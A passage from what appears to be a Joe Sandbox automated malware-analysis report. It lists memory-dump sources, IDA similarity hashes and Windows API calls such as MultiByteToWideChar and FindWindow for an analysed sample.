                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: a2464e8656ab0cb8d2aff4a53203c5ecd4f30c575dfc267a93c71999e671ab1f
                        • Instruction ID: 396bf07dc02132c0bd956e1f0f84811879bb756fc25d4b72a9b06fdd58061543
                        • Opcode Fuzzy Hash: a2464e8656ab0cb8d2aff4a53203c5ecd4f30c575dfc267a93c71999e671ab1f
                        • Instruction Fuzzy Hash: 13D022323C03007BE264F3B0DC0FFC6B605AB40B20F0089027301EA0D0C8F4B802CA08
                        Function 009BBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009BBE93
                        • GetLastError.KERNEL32 ref: 009BBEA1
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009BBEFC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: 60633dedce710f7da0d3e7682e85ddef7226f356d7d58af127a6bd8a4b718992
                        • Instruction ID: c2a6e86a8bde627e5f41c6819e90b7fa9cacdf4f1e130173a08f2d5595f02957
                        • Opcode Fuzzy Hash: 60633dedce710f7da0d3e7682e85ddef7226f356d7d58af127a6bd8a4b718992
                        • Instruction Fuzzy Hash: 45410A34600206AFCF219FA4CE54BFABBA9EF42730F144169F9599B1E1DBB08D01CB90